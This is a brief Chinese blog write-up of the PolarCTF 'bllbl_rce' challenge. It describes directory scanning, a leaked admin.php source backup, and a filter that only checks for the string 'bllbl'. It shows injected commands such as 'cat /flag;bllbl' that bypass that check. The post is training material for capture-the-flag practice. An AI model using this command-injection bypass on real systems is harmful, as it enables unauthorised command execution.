polar bllbl_rce

发表于2025-04-01更新于2025-07-23

字数总计:96阅读时长:1分钟阅读量: 衡阳

polar bllbl_rce

达达2025-04-012025-07-23

polar bllbl_rce

发现尝试输入什么都会返回 no

目录扫描一下这边用的御剑

发现了http://b03cb505-b6b0-4441-afa9-3394da78554d.www.polarctf.com:8090/admin/admin.php

访问后下载源码备份查看源码

if (strpos($command, ‘bllbl’) === false)

这里发现我们输入的命令里要有 bllbl 字符

那可以输入命令了 ls /;bllbl

cat /flag;bllbl

达达

与其等风来不如追风去

原创 polar bllbl_rce

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自永远自由如风永远为自己着迷！

喜欢这篇文章的人也看了

php内置类信息泄露

NSSRound#28 Team ez_php

ctfshow php特性刷题笔记

小蓝鲨的冒险

ISCTF 千年樱